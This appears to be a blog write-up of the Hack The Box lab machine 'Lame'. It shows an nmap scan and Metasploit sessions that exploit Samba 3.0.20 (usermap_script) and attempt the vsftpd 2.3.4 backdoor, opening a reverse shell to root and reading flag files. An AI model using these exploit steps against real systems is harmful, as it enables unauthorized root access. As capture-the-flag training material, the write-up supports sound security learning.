Lame (HACKTHEBOX)

Method 1:

root@kali:~/Downloads# nmap -A 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-01 18:32 EST
Nmap scan report for 10.10.10.3
Host is up (0.14s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 – secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|broadband router|remote management|printer|general purpose|specialized
Running (JUST GUESSING): Linux 2.4.X|2.6.X (92%), Arris embedded (92%), Control4 embedded (92%), Dell embedded (92%), Linksys embedded (92%), Tranzeo embedded (92%), Xerox embedded (92%), Citrix XenServer 5.X (92%)
OS CPE: cpe:/o:linux:linux_kernel:2.4.30 cpe:/h:dell:remote_access_card:6 cpe:/h:linksys:wet54gs5 cpe:/h:tranzeo:tr-cpq-19f cpe:/h:xerox:workcentre_pro_265 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:2.6.18 cpe:/o:citrix:xenserver:5.5
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Arris TG862G/CT cable modem (92%), Control4 HC-300 home controller (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 – 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%), Linux 2.6.27 – 2.6.28 (92%), Linux 2.6.8 – 2.6.30 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2d22h04m02s, deviation: 0s, median: -2d22h04m02s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2018-12-29T15:28:52-05:00
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 143.52 ms 10.10.14.1
2 144.34 ms 10.10.10.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.51 seconds

port : 21 , 22 , 139 , 445

now on browser

search : Samba smbd 3.x exploit

msf > use exploit/multi/samba/usermap_script

msf exploit(multi/samba/usermap_script) > set rhost 10.10.10.3

msf exploit(multi/samba/usermap_script) > exploit

msf exploit(multi/samba/usermap_script) > sessions -u 1

meterpreter > cd /home

meterpreter > ls

meterpreter > cd makis

meterpreter > ls

meterpreter > cat user.txt

meterpreter > cd /root

meterpreter > ls

meterpreter > cat root.txt

================================================================

Method 2:

msf > use auxiliary/scanner/smb/pipe_auditor
msf auxiliary(scanner/smb/pipe_auditor) > show options

Module options (auxiliary/scanner/smb/pipe_auditor):

Name Current Setting Required Description
—- ————— ——– ———–
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target address range or CIDR identifier
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads

msf auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf auxiliary(scanner/smb/pipe_auditor) > RUN
[-] Unknown command: RUN.
msf auxiliary(scanner/smb/pipe_auditor) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/pipe_auditor) > show options

Module options (auxiliary/scanner/smb/pipe_auditor):

Name Current Setting Required Description
—- ————— ——– ———–
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS 10.10.10.3 yes The target address range or CIDR identifier
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads

msf auxiliary(scanner/smb/pipe_auditor) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/pipe_auditor) > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 21 yes The target port (TCP)

Exploit target:

Id Name
— —-
0 Automatic

msf exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 10.10.10.3
rhost => 10.10.10.3
msf exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 10.10.10.3:21 – Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 – USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf exploit(unix/ftp/vsftpd_234_backdoor) > use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 139 yes The target port (TCP)

Exploit target:

Id Name
— —-
0 Automatic

msf exploit(multi/samba/usermap_script) > set rhost 10.10.10.3
rhost => 10.10.10.3
msf exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP double handler on 10.10.14.11:4444
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo gNFGEeM3hzxVTibV;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “gNFGEeM3hzxVTibV\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (10.10.14.11:4444 -> 10.10.10.3:47167) at 2018-12-20 11:22:31 -0500

pwd
/
whoami
root
cd /root
cat root.txt
92caac3be140efXXXXXXXXXXXXXXXXXXXX
ls
Desktop
reset_logs.sh
root.txt
vnc.log
cd Desktop
ls
pwd
/root/Desktop
cd ..
ls -lrt
total 16
drwxr-xr-x 2 root root 4096 May 20 2012 Desktop
-rwx—— 1 root root 401 May 20 2012 reset_logs.sh
-rw——- 1 root root 33 Mar 14 2017 root.txt
-rw-r–r– 1 root root 118 Dec 13 17:55 vnc.log
pwd
/root
cd ..
ls -lrt
total 89
drwx—— 2 root root 16384 Mar 16 2010 lost+found
drwxr-xr-x 4 root root 4096 Mar 16 2010 media
drwxr-xr-x 2 root root 4096 Mar 16 2010 srv
drwxr-xr-x 2 root root 4096 Mar 16 2010 opt
drwxr-xr-x 2 root root 4096 Mar 16 2010 initrd
drwxr-xr-x 12 root root 4096 Apr 28 2010 usr
drwxr-xr-x 3 root root 4096 Apr 28 2010 mnt
lrwxrwxrwx 1 root root 29 Apr 28 2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server
lrwxrwxrwx 1 root root 32 Apr 28 2010 initrd.img -> boot/initrd.img-2.6.24-16-server
lrwxrwxrwx 1 root root 11 Apr 28 2010 cdrom -> media/cdrom
drwxr-xr-x 2 root root 4096 May 13 2012 sbin
drwxr-xr-x 13 root root 4096 May 13 2012 lib
drwxr-xr-x 2 root root 4096 May 13 2012 bin
drwxr-xr-x 4 root root 1024 May 13 2012 boot
drwxr-xr-x 15 root root 4096 May 20 2012 var
drwxr-xr-x 6 root root 4096 Mar 14 2017 home
dr-xr-xr-x 117 root root 0 Dec 13 17:54 proc
drwxr-xr-x 12 root root 0 Dec 13 17:54 sys
drwxr-xr-x 13 root root 13560 Dec 13 17:55 dev
drwxr-xr-x 95 root root 4096 Dec 13 17:55 etc
drwxr-xr-x 13 root root 4096 Dec 13 17:55 root
-rw——- 1 root root 14473 Dec 13 17:55 nohup.out
drwxrwxrwt 6 root root 4096 Dec 17 08:25 tmp
cd home
ls -lrt
total 16
drwxr-xr-x 2 root nogroup 4096 Mar 17 2010 ftp
drwxr-xr-x 2 service service 4096 Apr 16 2010 service
drwxr-xr-x 3 1001 1001 4096 May 7 2010 user
drwxr-xr-x 4 makis makis 4096 Dec 14 06:25 makis
cd user
ls -lrt
total 0
cd ..
cd makis
ls -lrt
total 4
-rw-r–r– 1 makis makis 33 Mar 14 2017 user.txt
cat user.txt
69454a937d94f5fXXXXXXXXXXXXXXXXXXXXX

@SAKSHAM DIXIT

Related Posts

COMMENTS

Leave a Reply

Your email address will not be published. Required fields are marked *